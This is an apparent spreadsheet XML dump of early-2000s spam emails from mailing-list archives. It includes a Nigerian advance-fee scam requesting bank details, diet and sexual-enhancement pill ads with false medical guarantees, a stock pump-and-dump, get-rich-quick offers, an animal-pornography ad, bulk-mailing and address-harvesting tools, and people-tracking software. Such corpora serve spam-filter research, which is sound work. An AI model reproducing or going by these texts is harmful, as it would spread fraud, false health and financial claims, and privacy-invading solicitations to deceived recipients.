        CLICK to offer interesting to YOU !http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Earn High Commissions for Booking OnlineNORTHSTAR
      Travel Media, LLCÂ  and
      MailPound.com, a division of SMART Travel Technologies, Inc.
      provide travel professionals with information, services and marketing
      solutionsÂ 
Attention: 
Travel
      agents, outside agents, independent agents, corporate travel agents:
      (Click for more
      information)
Â 
      MailPound is a Trademark of SMART Travel
      Technologies, Inc.If you do not want to receive these messages in
the future, please click
here.
PLEASE
DO NOT REPLY to this email.Â Â For questions or comments on this offer,
please contact the supplier.Â Â 
 For all other inquiries, please email us at support@mailpound.com.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,I was recently browsing the internet and came accross some guys that are making really good job. 
Here they are - www.templatestyles.com .
Check it out. Nice designs!yorth sincerely,
Mark Boen Lowen-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-Sightings mailing list
Spamassassin-Sightings@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-sightings
</t>
  </si>
  <si>
    <t>Hi we are luke's secret following we love luke fictitious!We are also your long lost friend! HiThis email has nothing to do with lukefictitious.comWe wil be putting up our very own fan site soon
and wanted to let you know in advance!Have a beautifull day!</t>
  </si>
  <si>
    <t xml:space="preserve">Long time no chat!How have you been? If you've been like me, you've been trying
trying almost EVERYTHING to lose weight.Â  I know how you feel
- the special diets, miracle pills, and fancy exercise 
equipment never helped me lose the pounds I needed to lose
either.Â  It seemed like the harder I worked at it, the less
weight I lost - until I heard about 'Extreme Power Plus'.You're probably thinking to yourself, "Oh geez, not another
miracle diet pill!"Â  Like you, I was skeptical at first, but 
my sister said it helped her lose 23 pounds in just 2 weeks, 
so I told her I'd give it a try.Â  I mean, there was nothing 
to lose except a lot of weight!Â  Let me tell you, it was
the best decision I've ever made.  PERIOD.  Six months later,
as I'm writing this message to you, I've gone from 355 pounds
to 210 pounds, and I haven't changed my exercise routine or diet
at all.Â  Yes, I still eat pizza, and lots of it!I was so happy with the results that I contacted the manufacturer
and received permission to resell it - at a HUGE discount.Â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day.Â  
Just try it for one month - there's pounds to lose and confidence 
to gain!Â  You will lose weight fast - GUARANTEED.Â  This is my
pledge to you.BONUS! Order now and get FREE SHIPPING on 3 bottles or more!Â  To order Extreme Power Plus on our secure server, just click
on this link -&gt; http://www.2002dietspecials.com/To see what some of our customers have said about this product, 
visit http://www.2002dietspecials.com/testimonials.shtmlTo see a list of ingredients and for more information
on test studies and how it will help you lose weight, visit 
http://www.2002dietspecials.com/ingre1.shtml**************************************************************
If you feel that you have received this email in error, please 
send an email to "print2@btamail.net.cn" requesting to be 
removed. Thank you, and we apologize for any inconvenience.
**************************************************************http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
moiadHerbal Alternative
for Erectile Dysfunction
Men of Iron has been featured on
over 100 TV News and Top Radio stations across America, and we know why...
It REALLY works!
Visit Our Web Site Click Here: 
Learn about our special offer!Men Of Iron Benefits:
â€¢ Number 1 formula for men
â€¢ Dramatically Enhances Organism
â€¢ No Negative Side Effects (All Natural
Ingredients).
â€¢ Boosts Multiple Orgasms!
â€¢ Does Not Increase Blood Pressure! 
â€¢ Increases circulation in men so erections
become firmer.
â€¢ Helps sexual response dysfunction or
lack of interest in sex.
â€¢ Clears impotency problems. 
â€¢ Boosts Multiple Climaxes. 
â€¢ Relieves Emotional Ups Downs, and Headaches!
â€¢ Helps Relieve Prostate Problems. 
â€¢ Lowers Cholesterol. 
â€¢ Very Affordable Price
Visit Our Web Site Click Here: 
Learn about our special offer!
</t>
  </si>
  <si>
    <t xml:space="preserve">Note:If this eamil is not fit for you,please reply to webmaster@wjjzzs.com with "remove".You'd tell me the email address we've used.
We don't intend to send spam email to you.Thank you!ATTN:fork@xent.com
Dear sirs or Madams,
We are one Arcyl bathtub manufacturer in China.-----------------Profile-----------------------Our factoryspecializes in manufacturing ï¿½ï¿½YEMAï¿½ï¿½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span.Besides our products on website, we now produce some new models for USA market. We also produce shower panels with finest quality.-------------------bathtub Specifications---------------------
1,Wall thickness:10mm~20mm
2,Weight: 50~60KG-------------------Cooperate--------------------------------We would like to be your OEM/ODM manufacturer.For detailed info, please browse our website http://www.wjjzzs.comBest wishes and regards,Export Manager
Jerry Lee
Mobile:13951228561
Phone:0086-519-5211973
Fax:  0086-519-5209776
Wujin Huangli Composited Sanitary Factory
Add:HUangli town,Wujin county
    Changzhou 213151
    Jiangsu province
    P.R.China
Websie:http://www.wjjzzs.com
Email:wjjzzs@wjjzzs.comJuly 18, 2002
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;!--
a {  text-decoration: none }
--&gt;V.I.P 
        Animal lovers club invite new members!
No 
          shit! Only REAL ANIMAL porn !
Our super active members send
          home video and photos every day!
Don't miss this 
        offer !
        CLICK to JOIN US !
[ 
  remove my email from mail list ]
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">This is the worst job market we've seen in over 30 years.  The recent corporate scandals have further deepened the lack 
confidence in our economy and the plunging stock market that
 is in the headlines this week will lead to additional layoffs creating 
an EVEN MORE DIFFICULT JOB MARKET.Finding a job in today's market is a whole new ballgame.  Blasting your resume to thousands of recruiters, posting your
resume to job boards and responding to job postings and
advertisements works for only 5% of the job seekers using
these techniques.Job searching based upon the tried and true process and 
techniques used by recruiting professionals works for 85%.  It's a no-brainer.  Invest $19.95 + shipping/handling
(fully tax-deductible) in the Get Hired Now Program.Our CD program will teach you EVERYTHING you need to know
to quickly succeed in ANY job market.Get Hired Now teaches a full job search process - proactive techniques 
and insider tips used by senior staffing professionals who have spent 
over 20 years getting people hired.Call us toll free at 800-500-0406.Mention this email and get a FREE JOB SEARCH WORKBOOK** We accept Visa, MasterCard and American Express!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</si>
  <si>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HAS YOUR MORTGAGE SEARCH GOT YOU DOWN?Win a $30,000 mortgage just for trying to get your mortgage rates down, and a little cash in your pocket!!
know who is telling you the truth! We can solve all your problems.Visit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[PO1:KJ)_8J7BJK9^":}]
</t>
  </si>
  <si>
    <t xml:space="preserve">We offer some of the best bulk e-mail prices on the Internet. We do all 
the mailing for you. 
You just provide us with the ad! It's that simple!prices start at   $200.00 for 1-million e-mails sent. 
our target list start at $400.00 for 1-million e-mails sent. We give you a free mllion for ordering within 2 days.  I can also send 
you the names on cd w/sending tools.  
So thats us mailing +
the names on CD with tools.209-656-9143-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
Â 
Major Medical 
            BreakthroughHuge Profit Potential
Imagine yourself as part owner of the 
      most interesting, full service state-of-the-art medical facility, equipped 
      with the most sophisticated and effective scanning diagnostic tools 
      available today.
Electron Beam Tomography is a 
      cutting-edge diagnostic technology capable of providing a 
      crystal-ball-like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10 times faster and 
      clearer than other conventional scanners.
The dramatic capabilities of this 
      spectacular technology should provide an extraordinary investment 
      opportunity for those establishing state-of-the-art outpatient clinics, in 
      order to provide the EBT body scan procedures to health conscious 
      Americans. Projected 10-year return of 916%.
A full-body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Name:Phone Number
                        (including area code):Mailing Address:Province / 
                        State:Postal CodeÂ E-mail Address:Â 
To be removed from this list please reply with UNSUBSCRIBE.  Thank you.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">MR.RONARD TONY
WEMA BANK PLC. 
LAGOS/NIGERIA 
Email: ronardtony@mail.com
Dear Sir, REQUEST FOR CO-OPERATION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$14,900,000:00
(Fourteen Million, Nine Hundred United States Dollars)
with your co-operation and assistance by just doing
the following: 
- (a) Act as next of kin or relation of late Dr.David
Fang (b) Provide your bank account and location where you
want the money remitted .
(c) Provide your direct and private Telephone/Fax
numbers for effective communication 
(d) Give immediate reply to this proposal using the
above Tel/Fax 
number for details on how to proceed. For your co-operation and efforts, 40% of the money
will be for you as my foreign partner,10% for
settlement of all expenses that might be incurred on
the course of this transaction, while 50% will be for
myself that will eventually visit your country for
disbursement of the fund. Looking forward to a mutual and beneficial business
relationship. Regards,
RONARD TONY.
</t>
  </si>
  <si>
    <t xml:space="preserve">creditfixThank You,Your email address was obtained from a purchased 
list, Reference # 1320-15000.Â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</si>
  <si>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kanzhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">In a recent survey conducted by Durex
condoms, 67%
of women said thatthey are unhappy with the size of their lovers. Proof that size doesmatter! A large member has much more surface area and is capable ofstimulating more nerve endings, providing more pleasure for you and yourpartner. Our revolutionary pill developed by world famous pharmacist isguaranteed to increase your size by 1-3".Enter here for detailsTo come off just Open here
</t>
  </si>
  <si>
    <t xml:space="preserve">In a recent survey conducted by Durex
&lt;
/
F
O
N
T
&gt;
c
o
n
d
o
m
s
,
&lt;
F
O
N
T
C
O
L
O
R
3
D
#
F
F
0
0
3
3
&gt;
6
7%
&lt;
/
F
O
N
T
&gt;
o
f
w
o
m
e
n
s
a
i
d
t
h
a
t
&lt;
b
r
&gt;
t
h
e
y
a
r
e
u
n
h
a
p
p
y
w
i
t
h
t
h
e
s
i
z
e
o
f
t
h
e
i
r
l
o
vers. Proof that size doesmatter! A large member has much more surface area and is capable ofstimulating more nerve endings, providing more pleasure for you and yourpartner. Our revolutionary pill developed by world famous pharmacist isguaranteed to increase your size by 1-3".Enter here for detailsTo come off just Open here
</t>
  </si>
  <si>
    <t xml:space="preserve">
browserVer=parseInt(navigator.appVersion); 
HB=window.open('http://61.129.68.32/empires/ghi.html','HBback','toolbar=no,menubar=no,status=no,directories=no,location=no,scrollbars=no,resizable=no,width=468,height=120' );
if(browserVer&gt;=4){ 
window.focus(); 
}
Internet Empires
Take Control of your
FINANCIAL FUTURE
Make $7,000 / Month
Learn how to get. . .
5 Money-Making 
Web Sites
Dear Friend,
You're about to discover how you can have FIVE of your own Internet businesses set up and taking orders within 29 minutes...for less than half of what most people spend on groceries!
But first, please let me introduce myself... 
Hi! My name is Frank Kern. I'd like for you to know up front that I'm not an Internet Guru...Not A Computer Wiz...And Not A Marketing Genius. 
First of all, I'll admit that I don't expect you to believe a single word I say. 
After all, how many times a day are you BOMBARDED with some "get-rich-quick" scheme on the Internet?
You probably get a brand new promise of instant wealth every few hours in your e-mail box and if you're anything like me, you've tried a few and been left with nothing but a hole in your pocket!
Well, I've got great news for you. 
My unprofessional, little "Home Made" web site brought in $115,467.21 last year and you're about to discover how. . . . . . you can do the same!Click 
                    Here For Federally Documented ProofThis message is coming to you as a result of an Opt-in Relationship our Clients have had with you. If you simply wish to be Removed from all future Messages, 
then CLICK 
HERE [TG0BK5NKIYs5]</t>
  </si>
  <si>
    <t xml:space="preserve">
A:link {
    TEXT-DECORATION: none
}
A:active {
    TEXT-DECORATION: none
}
A:visited {
    TEXT-DECORATION: none
}
A:hover {
    COLOR: #0033ff; TEXT-DECORATION: underline
}
                                 For 
                                       Immediate ReleaseCal-Bay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25 cents 
      and should skyrocket to $2.66 - $3.25 a share in the near future. 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Research.RAPIDLY GROWING INDUSTRYÂ Industry revenues exceed $900 million, estimates indicate that there 
      could be as much as $25 billion from "smell technology" by the end of 
      2003.!!!!! CONGRATULATIONS 
      !!!!!Our last recommendation to buyÂ ORBT at 
      $1.29Â ralliedÂ and is holding steady atÂ $4.51!Â  
      Congratulations to all our subscribers that took advantage of this 
      recommendation.
ALL removes HONERED. Please allow 7 
      days to be removed and send ALL address to:
NeverAgain@btamail.net.cnÂ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
</t>
  </si>
  <si>
    <t xml:space="preserve">
Now you can have HUNDREDS of lenders compete for your loan!Refinancing
New Home Loans
Debt Consolidation
Debt Consultation
Auto Loans
Credit Cards
Student Loans
Second Mortgage
Home EquityDear Homeowner,
Interest Rates are at their lowest point in 40 years!
We help you find the best rate for your situation by matching your needs with hundreds of lenders! Home Improvement, Refinance, Second Mortgage, Home Equity Loans, and More! Even with less than perfect credit!This service is 100% FREE to home owners and new home buyers without any obligation.
Just fill out a quick, simple form and jump-start your future plans today!
Click Here To BeginPlease know that we do not want to send you information regarding our special offers if you do not wish to receive it.  If you would no longer like us to contact you or feel that you have received this email in error, please click here to unsubscribe.</t>
  </si>
  <si>
    <t xml:space="preserve">
	Aren't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1/3 the opportunity of all 
other Americans to rise to the top in the academic world, 
corporate world, the federal government.  There seems to exist 
an invisible resistance to AAs' developing to the maximal of 
their potentials  --  A Glass Ceiling.	Let's look at a concrete case.  A lot of our best people are 
employed in universities.  Their average performance has been 
outstanding.  What's their chance of rising to the top?  	University administrators are recruited almost exclusively 
from the ranks of faculty and professionals already employed in 
universities.  Hence the ratio of [administrators / (faculty + 
professionals)], broken down to races, is a measure of the 
opportunity enjoyed by American citizens of different races.  
Nationwide, that ratio for blacks (non-Hispanic) is 0.21.  That is, 
for every 100 black faculty and professionals there are 21 black 
administrators.  The ratio for Native American is 0.20; for white 
(non-Hispanic) is 0.16; and for Hispanic is 0.15.  However, it is 
only 0.06 for Asian American.  Get on the Web and check it out 
for yourself!  Source:  Dept. of Education - , Table B-1f.	The above dismal picture emerges from the supposedly 
"enlightened" academic world.  The situation in the corporate 
world, state and federal governments is worse.  	In E-Mail 2 &amp; 3,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bloc-vote organized and delivered by 80-20 in 
the 2000 election.
Sincerely (members of Steering Comm., titles for ID purposes only)Rajen Anand, Secretary, Federation of Indian-Am. Assocs.,
Tong S. Chung, Founding President &amp; Current Chairman of the Board,
                     Korean American Coalition, DC chapter,
Alex Esclamado, Nat'l President, Filipino-Am. Political Assoc.,
Kenneth Fong, C.E.O., Clontech Laboratories,
Yu-Chi Ho, Harvard Univ., member of Nat'l Acad. of Engineering,
Stephen S. Ko, MD, Founder of Asian Am. Political Coalition N.J.,
Tony Lam, Councilman, Westminster, Los Angeles, California,
Michael Lin, former Nat'l President, Org. of Ch-Ams (1994-98),
Adeel Shah, Co-founder &amp; Chairman/CEO of Telnia Corporation and
          President, US-Pakistan Business Council Washington, D.C.,
Peter Suzuki, Immediate Past President, National Asian/Pacific Am.
                   Bar Association (NAPABA),
Henry Tang, Chair, Committee of 100,
Shaie-Mei Temple, Founding President, OCA-women New Orleans
                    Chapter; Strategic Consultant,
Chang-Lin Tien, Chancellor, Univ. of Calif., Berkeley (1990-97),
Chun Wa Wong, Univ. of Calif., Los Angeles, Fellow, Am. phys. Soc.,
S. B. Woo, Lieutenant Governor of Delaware (1985-89)
Jenny Yang, President, Assoc. of Chinese Am. Professionals; Co-founder,
                  Houston 80-20* * * * * * * * * * *
80-20 is a national, nonpartisan, Political Action Committee 
dedicated to winning equal opportunity and justice for all 
Asian Pacific Americans through a SWING bloc vote, ideally 
directing 80% of our community's votes and money to the 
presidential candidate endorsed by the 80-20, who better 
represents the interests of all APAs.  Hence, the name "80-20" was 
created. 
  -- For unsubscribing,  return this email AND add the word:REMOVE. --
  -- To get on 80-20's supporters list, reply with the word:ENLIST. --MsTo: matthew.simonton@blade.net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</si>
  <si>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GT TONER
SUPPLIESLaser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supplies.Â Â Â  Order by
phone: (toll free) 1-866-237-7397
Â Â Â  Order by email: Simply reply this message or click hereÂ 
with subject:  ORDER
Â Â Â     Email
removal: Simply reply this message or click here  
Â  with subject:
 REMOVEUniversity   and/orSchool   purchase
orders WELCOME. (no credit approval required)
Pay by check, c.o.d, or purchase order (net 30 days).
WE ACCEPT ALL MAJOR CREDIT CARDS!New! HP 4500/4550 series color
cartridges in stock!  Our cartridge prices are as follows: 
(please order by item number) ItemÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Hewlett
     PackardÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Price 1 -- 92274A Toner Cartridge for LaserJet 4L, 4ML, 4P, 4MP
------------------------$47.502 -- C4092A Black Toner Cartridge for LaserJet 1100A, ASE, 3200SE-----------------$45.502A - C7115A Toner Cartridge For HP LaserJet 1000, 1200, 3330 ---------------------$55.502B - C7115X High Capacity Toner Cartridge for HP LaserJet 1000, 1200, 3330 -------$65.503 -- 92295A Toner Cartridge for LaserJet II, IID, III, IIID ----------------------$49.504 -- 92275A Toner Cartridge for LaserJet IIP, IIP+, IIIP -------------------------$55.505 -- C3903A Toner Cartridge for LaserJet 5P, 5MP, 6P, 6Pse, 6MP, 6Pxi ------------$46.506 -- C3909A Toner Cartridge for LaserJet 5Si, 5SiMX, 5Si Copier, 8000 ------------$92.507 -- C4096A Toner Cartridge for LaserJet 2100, 2200DSE, 2200DTN ------------------$72.508 - C4182X UltraPrecise High Capacity Toner Cartridge for LaserJet 8100 Series---$125.509 -- C3906A Toner Cartridge for LaserJet 5L, 5L Xtra, 6Lse, 6L, 6Lxi, 3100se------$42.50 9A - C3906A Toner Cartridge for LaserJet 3100, 3150 ------------------------------$42.5010 - C3900A Black Toner Cartridge for HP LaserJet 4MV, 4V ------------------------$89.5011 - C4127A Black Toner Cartridge for LaserJet 4000SE, 4000N, 4000T, 4000TN ------$76.5011A- C8061A Black Laser Toner for HP LaserJet 4100, 4100N ------------------------$76.5011B- C8061X High Capacity Toner Cartridge for LJ4100, 4100N ----------------------$85.5011C- C4127X High Capacity Black Cartridge for LaserJet 4000SE,4000N,4000T,4000TN
-$84.5012 - 92291A Toner Cartridge for LaserJet IIISi, 4Si, 4SiMX -----------------------$65.5013 - 92298A Toner Cartridge for LaserJet 4, 4 Plus, 4M, 4M Plus, 5, 5se, 5M, 5N
--$46.5014 - C4129X High Capacity Black Toner Cartridge for LaserJet 5000N ---------------$97.5015 - LASERFAX 500, 700 (FX1) -----------------------------------------------------$49.0016 - LASERFAX 5000, 7000 (FX2) ---------------------------------------------------$54.0017 - LASERFAX (FX3) --------------------------------------------------------------$49.0018 - LASERFAX (FX4) --------------------------------------------------------------$49.00 ItemÂ Â Â Â Â Â Â Â Â Â Â 
Hewlett Packard - ColorÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Â Â 
Price C1 -- C4194a Toner
Cartridge,
Yellow (color lj 4500/4550 series)------------------ $ 89.50
C2 -- C4193a Toner
Cartridge, Magenta (color lj 4500/4550 series)-----------------
$ 89.50
C3 -- C4192a toner cartridge, cyan (color lj 4500/4550 series)-------------------- $
89.50
C4 -- c4191a toner cartridge, black (color lj 4500/4550 series)-------------------
$ 74.50 ItemÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
LexmarkÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Price 19 - 1380520 High Yield Black Laser Toner for 4019, 4019E, 4028, 4029, 6, 10, 10L -- $109.50
20 - 1382150 High Yield Toner for 3112, 3116, 4039-10+, 4049- Model 12L,16R,
Optra - $109.50
21 - 69G8256 Laser Cartridge for Optra E,
E+, EP, ES, 4026, 4026 (6A,6B,6D,6E)Â  ---- $ 49.00
22 - 13T0101 High Yield Toner Cartridge for Lexmark Optra E310, E312, E312L -------- $ 89.00
23 - 1382625 High-Yield Laser Toner Cartridge for Lexmark Optra S (4059) ----------- $129.50
24 - 12A5745 High Yield Laser Toner for Lexmark Optra T610, 612, 614 (4069) -------- $165.00 ItemÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
EpsonÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Price25
---- S051009 Toner Cartridge for Epson EPL7000, 7500, 8000+ - $115.50
25A --- S051009 LP-3000 PS 7000 -------------------------------- $115.50
26 ---- AS051011 Imaging Cartridge for
ActionLaser-1000, 1500 -- $ 99.50
26A --- AS051011 EPL-5000, EPL-5100, EPL-5200 ------------------ $ 99.50ItemÂ Â Â Â Â Â Â Â Â Â Â 
PanasonicÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Price
27
------Nec series 2 models 90 and 95 ---------------------- $109.50
ItemÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Â Â Â Â 
AppleÂ  Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â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$ 85.50ItemÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
CanonÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â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$ 85.50ItemÂ Â 
XeroxÂ Â Â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you.CustomerÂ 
Satisfaction guaranteed
If you are ordering by e-mail or
c.o.d. please fill out an order
form with the following information:Â Â Â 
Â Â Â Â Â Â Â Â 
Â 
phone number
company name
first and last name
street address
city, state zip codeÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Order Now or
call toll free  1-866-237-7397 If you are ordering by purchase order please fill out an order form
with the following information:Â Â Â  Â Â Â Â Â Â Â purchase order number
phone number
company or school name
shipping address and billing address
city, state zip codeÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Order
Now
All trade marks and brand names listed above are property
of the respective
holders and used for descriptive purposes only.
</t>
  </si>
  <si>
    <t xml:space="preserve">In 1957,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solid-gold Buddha.Many historians believe the Buddha had been covered with clay by Thai monks
several hundred years earlier before an attack by the Burmese army. They
covered the Buddha to keep it from being stolen. In the attack all the monks
were killed, so it wasn't until 1957,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piece.Could you be sitting on your own gold mine? Did you know the average
American can retire a millionaire on his or her current income? Then, why
don't they? It's simple. They haven't been taught that they could. They are
taught to use debt to get what they want now instead of having their money
work for them. They pay too much in taxes. They are wasting money every
month and don't even realize it. In short, they are financially unhealthy.
Get a financial checkup and a free video on how to become "Financially Fit
For Life" and discover the gold within your current income.Get your FREE 3-Point Checkup and Video Now!
http://216.190.209.155/finfit/checkup.html----------------------------------------------------------------------------To unsubscribe, email removeme@speededelivery.com with the subject "Remove".SpeedeDelivery . Jordan Commons Tower 
9350 South 150 East
Sandy, UT 84070----------------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">
Useful for your Individual and Business investigation needs:
GET  THE TRUTH ABOUT ANYONE AND  ANYTHINGÂ… 
over the internet
 Please
  click on this link for more  information.
Finally find,
    track and learn  anything about
    anyone just like a professional  Private Eye, but without a license!  Find  
people
    who have moved or changed their  name. Identify addresses, phone  numbers,
 P.O. boxes. 
 Locate  
relatives,
    old friends or your deadbeat spouse  you haven't seen in more than a  
decade.
Exercise
    your rights check public records and  obtain FBI,
    CIA and other government  documents.  Perform  
do-it-yourself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It's like having a gateway to a  
virtual
  investigative library through your own  computer.
With
  the most talked about software on the  net...Internet Detective 7.5 
you
  can verify anyone's income, assets,  education, employment history and  
brushes
  with the law. Unearth your own family  secrets and check your credit report.  Track someone down from a phone  number, license plate, alias or s/s  
number,
  and much more... 
Please
  click on this link for more  information.
 click here
to be removed from our mailing  list.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</si>
  <si>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derekw
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Â  
Â 
Direct Email 
Blaster 
The program will send mail at the 
rate of over 1, 000 e-mails per minute.Â Legal and Fast 
sending bulk emailsÂ Built in SMTP 
serverÂ Have Return PathÂ Can Check Mail 
AddressÂ Make Error Send Address List( Remove or 
Send Again)Â Support multi-threads.Â Support 
multi-smtp servers.Â Manages your opt-in E-Mail ListsÂ Offers an 
easy-to-use interface!Â Easy to configure and useÂ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â€¿/NOBR&gt; EMV disconnect 
as soon as mail server informs does this address exist or not. EMV can 
find
Â about 90% of dead addresses â€¿/NOBR&gt; some mail 
systems receive all messages and only then see theirÂ 
addresses and if the address is dead send the message 
back with remark about it.
Download Now
Express Email 
BlasterÂ 
Express Email BlasterÂ  is a very fast, powerful yet 
simple to use email sender. Utilizing multiple threads/connections
Â and multiple SMTP servers your emails will be sent out 
fast and easily. There are User Information, Attach Files,Â 
Address and Mail Logs four tabbed area for the E-mails 
details for sending. About 25 SMTP servers come with theÂ 
demo version, and users may Add and Delete SMTP servers. 
About 60,000 E-mails will be sent out per 
hour."
Download Now
Express Email Address 
Extractor
This program is the most efficient, easy to use 
email address collector available on the 
Â internet! Beijing Express Email Address Extractor (ExpressEAE) is 
designed to extract
Â e-mail addresses from web-pages on the 
Internet (using HTTP protocols) .ExpressEAE
Â supports operation through many proxy-server 
and works very fast, as it is able ofÂ 
loading several pages simultaneously, and requires 
very few resources.
With it, you will be able 
to use targeted searches to crawl the 
world wide web, extractingÂ 
thousands of clean, fresh email 
addresses. Ably Email address Extractor is unlike otherÂ 
address collecting programs, which 
limit you to one or two search engines and are unable
Â to do auto searches HUGE address. 
Most of them collect a high percentage of incomplete,Â 
unusable addresses which will cause you 
serious problems when using them in a mailing.Â Easier to learn and use than any 
  other email address collector program available.
Accesses eight search 
  enginesÂ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ExpressEADÂ  
  is a 32 bit Windows Program for e-mail 
  marketing. It is intended for easy and convenient
Â search large 
  e-mail address lists from mail servers. The program can be operated 
  onÂ 
Windows 95/98/ME/2000 
  and NT.
ExpressEADÂ  
  support multi-threads (up to 1024 
  connections).
ExpressEADÂ  
  has the abilityÂ  to reconnect to the 
  mail server if the server has disconnected andÂ 
continue the searching 
  at the point where it has been interrupted.
ExpressEADÂ  
  has an ergonomic interface that is easy to 
  set up and simple to use. 
Â  
Features:support 
  multi-threads.
auto get smtp server 
  address,support multi-smtp servers.
auto saveÂ  E-Mail 
  Lists
offers an easy-to-use 
  interface! 
Download Now 
Â  
Express Maillist 
Manager 
Â  This program was designed to be a 
complement to the Direct Email BlasterÂ  
and Email 
Blaster 
suite of bulk email software 
programs. Its purpose is to organize your email lists in order to be 
moreÂ 
effective with your email marketing 
campaign. Some of its features include:
â€¿Combine several lists into 
one file.â€¿Split up larger lists to make them more 
manageable.â€¿Remove addresses from file.â€¿Manual editing, adding, and deleting of addresses.â€¿Ability to auto clean lists, that is, remove any duplicate or unwanted 
addresses.â€¿Maintain all your address lists within the 
program so you noÂ  longer need to keep all your
Â lists saved as separate text 
files.
Download Now
Â 
Â 
if you want to remove your email, please send email to targetemailremoval@btamail.net.cnÂ  
Â  
Â 
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Computer User jm8675309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Evidence Eliminator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t>
  </si>
  <si>
    <t>Tired of Mounting Credit Card Debt?
Frustrated by Creditor Harrassment?
Bogged down by Medical Expenses?
Just Plain Tired of the Financial Insanity?By filling out the simple form below you can,Reduce your debts by up to 60%!
Reduce or Eliminate Interest!
Preserve or Rebuild your Credit
Stop the Harrassing Phone Calls!Follow the link below to fill out the short and easy form today!!
http://61.129.68.19/user0205/index.asp?Afft=DP09
It's a free quote and only take a couple of seconds!!Please know that we do not want to send you information regarding our special offers if you do not wish to receive it.  
If you would no longer like us to contact you or feel that you have received this email in error, please follow the link below
to unsubscribe.
http://61.129.68.19/light/watch.asp</t>
  </si>
  <si>
    <t xml:space="preserve">
BODY {font-family="Arial"}
TT {font-family="Courier New"}
BLOCKQUOTE.CITE {padding-left:0.5em; margin-left:0; margin-right:0; margin-top:0; margin-bottom:0; border-left:"solid 2";}
SPAN.TABOOHEADER {display=none}IT SpecialistsDear 
        IT Professionals,Have a problem or idea you need a solution for? 
        Â Not sure what it will cost so that you can budget accordingly?         Provide the details and we will be pleased to send you a Free 
        Project Scope Quote that includes all the details you will need to 
        know and the variables to consider.         We would be glad to deliver cutting-edge solutions to your IT challenges 
        at a quality that is equivalent or superior to that offered by domestic 
        companies, but at a fraction of the cost of domestic development.        We represent a number of well-established companies staffed with over 
        1000 qualified software developers with a record of successfully completing 
        hundreds of small and midsize projects and tens of wide-scale projects 
        for Fortune 100 corporations.From 
        business analysis and consulting to web design, from coding to testing 
        and porting we provide a full cycle of IT services!Working 
        both on-site and offshore our specialists develop and integrateInternet/Intranet/Extranet 
          applications 
Business 
          applications 
ERP, CRM 
          systems 
e-Business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resources!For 
        more info...CLICK 
        HERE!!!
Please include your phone number,
        and we will be happy to call you!Cost 
        effective IT solutions!
        Experienced teams of specialists!
        Fair rates!FREE 
        QUOTES!!
Here 
        is a list of some of the technologies and platforms that our specialists 
        employ to bring you only the best, most efficient and cost-effective solution:
Application 
              Platforms
.: 
              .Net
              .: Java2EE
              .: IBM WebSphere Â Â Â Â Suite
              .: Lotus Domino
              .: BEA WebLogic
              .: ColdFusionOperating 
              Systems
.: 
            Windows,
            .: UNIX
            .: IBMDatabases
.: 
            MS SQL
            .: Oracle
            .: DB2
            .: FoxPro
            .: Informix
            .: SybaseIT 
              Standards
.: 
              ActiveX, COM
              .: ASP
              .: CORBA
              .: JDBC
              .: ODBC
              .: WAP, WMLFor 
        more info...CLICK 
        HERE!!!
Please include your phone number,
        and we will be happy to call you!
If 
      you received this letter by mistake please click Unsubscribe
UCE transmissions can be stopped at no cost to the recipient by sending 
      a reply with the word 'remove' in the subject line. (Ref. 
      U.S. Senate Bill 1618, Title #3, Section 301) </t>
  </si>
  <si>
    <t>Hey,  I just wanted to tell you about a GREAT website.  http://www.metrojokes.com    Features lots of jokes!  Extremly unique features and classified in categories.  I appriciate your time.Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½!!!
http://dengi.150m.com/Golden%20Stream.htmhttp://dengi.150m.com/NEW.htm
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
